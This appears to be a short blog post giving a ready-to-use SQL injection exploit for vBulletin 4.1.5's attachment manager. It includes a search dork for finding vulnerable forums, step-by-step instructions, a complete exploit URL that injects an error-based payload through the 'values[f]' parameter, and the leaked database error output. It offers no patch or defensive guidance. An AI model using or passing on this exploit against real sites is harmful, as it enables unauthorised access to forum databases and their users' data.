الأربعاء، 27 مارس 2013

vbulletin 4.1.5 attachment SQLI


vbulletin 4.1.5 attachment SQLI
examine variables came across sq-injection, as later found to be inherent to all vbulletin 4.1.5. Title: Vulnerability in vBulletin 4.1.5 Dork: Powered by Powered by vBulletin 4.1.5 Conditions: The account on the forum. Permission to attach files to messages / themes (attachments) Register -> go to the forum -> click a topic or if the board is, you can choose to create an article (the second option more work) -> at the bottom looking Attachments 'Manage Attachments' - > Open the window and setting "values ​​[f]" insert our SQL query. Example:
Code:
http://site.com/board/newattachment.php?do=assetmanager&values[f]=-1599+or(1,2)=(select*from(select+name_const(version(),1),name_const(version(),1))a)&contenttypeid=18&poststarttime=1360663633&posthash=4f5c850593e10c5450d9e880d58a56d8&insertinline=1
After that, we see the standard error of the database offline, thus opening the source code of the page and see:

Code:
<! -
Database error in vBulletin 4.1.5 :
Invalid SQL :
             SELECT
                 permissionsfrom ,  Hidden ,  setpublish ,  publishdate ,  userid
             FROM ds23fSDdfsdf_cms_node
             WHERE
                 nodeid  = - 1599  or ( 1 , 2 ) = ( Select * from ( Select name_const ( version () , 1 ), name_const ( version (), 1 )) a );
MySQL Error    :  Duplicate column Name  .1.49-3 '5 '
Error Number   :  1060
Request Date   :  Tuesday ,  February 12th  2013   @  01 : 12 : 33 PM
Error Date     :  Tuesday ,  February 12th  2013   @  01 : 12 : 33

Address     :  127.0.0.1
Username       :  Hacker
Classname      :  vB_Database
MySQL Version  :  
->